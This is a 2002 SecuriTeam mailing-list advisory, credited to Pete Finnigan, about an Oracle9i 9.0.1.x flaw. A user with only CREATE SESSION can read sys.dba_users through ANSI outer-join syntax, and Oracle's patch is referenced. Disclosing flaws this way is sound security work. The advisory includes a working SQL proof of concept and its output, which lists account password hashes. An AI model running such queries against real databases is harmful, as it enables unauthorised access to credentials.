[NEWS] User Privileges Vulnerability in Oracle9i Database Server

From: support@securiteam.com
Date: 04/21/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Sun, 21 Apr 2002 20:57:48 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  User Privileges Vulnerability in Oracle9i Database Server
------------------------------------------------------------------------

SUMMARY

A potential security vulnerability has been discovered in Oracle9i
database server. It is possible to create a user defined in the Oracle9i
database server with limited privileges who can potentially access
privileged data using SQL syntax for outer joins. As such, a knowledgeable
and malicious user can gain unauthorized access to data in Oracle9i
database server.

DETAILS

Vulnerable systems:
Oracle9i Database, Release 9.0.1.x

Immune systems:
None of the Oracle8i (Release 8.1.x), Oracle8 (Release 8.0.x) or Oracle7
database server release is affected by this vulnerability.

Oracle 9i includes the new ANSI outer join syntax. Oracle still supports
the old syntax but in the new syntax, there is a serious security issue
that allows any user to view any data.

Workarounds:
There are no workarounds to protect against this potential vulnerability.

Patch Information:
Oracle has fixed the potential vulnerability identified above in the
upcoming Oracle Database server release, Oracle9i, Release 2. Patches with
the base bug fix number, 2121935, are being made available only for
supported releases of Oracle9i, Releases 9.0.1.x, database server on all
supported platforms.

Download currently available patches for your platform from Oracle's
Worldwide Support web site, Metalink, <http://metalink.oracle.com>
http://metalink.oracle.com. Activate the "Patches" button to get to the
patches Web page. Enter the base bug fix number indicated above and
activate the "Submit" button. Please check with Metalink or Oracle
Worldwide Support Services periodically for patch availability if the
patch for your platform is not yet available.

Example:
SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;

User created.

SQL> Grant Create Session to us1;

Grant succeeded.

SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
  2 from sys.dba_users a left outer join sys.dba_users b on
  3 b.username = a.username
  4 ;

USERNAME PASSWORD
------------------------------ ------------------------------
SYS D4C5016086B2DC6A
SYSTEM D4DF7931AB130E37
DBSNMP E066D214D5421CCC
AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD
OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD
AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD
SCOTT F894844C34402B67
US1 491AB9AB94D8A9EF
OUTLN 4A3BA55E08595C81
ORDSYS 7EFA02EC7EA6B86F
OLAPSVR AF52CFD036E8F425

USERNAME PASSWORD
------------------------------ ------------------------------
OLAPSYS 3FB8EF9DB538647C
ORDPLUGINS 88A2B2C183431F00
MDSYS 72979A94BAD2AF80
CTXSYS 71E687F036AD56E5
WKSYS 69ED49EE1851900D
OLAPDBA 1AF71599EDACFB00
QS_CBADM 7C632AFB71F8D305
QS_ADM 991CDDAD5C5C32CA
QS 8B09C6075BDF2DC4
QS_WS 24ACF617DD7D8F2F
HR 6399F3B38EDF3288

USERNAME PASSWORD
------------------------------ ------------------------------
OE 9C30855E7E0CB02D
PM 72E382A52E89575A
SH 9793B3777CD3BD1A
QS_ES E6A6FA4BB042E3C2
QS_OS FF09F3EB14AE5C26
RMAN E7B5D92911C831E1
QS_CB CF9CFACF5AE24964
QS_CS 91A00922D8C0F146

30 rows selected.

SQL>

This illustrates that a user with the barest of privileges, i.e. CREATE
SESSION can actually see data in the data dictionary that should not be
seen. In this example, we can select the list of usernames and their
hashes.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:pete@peterfinnigan.demon.co.uk> Pete Finnigan.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Quantcast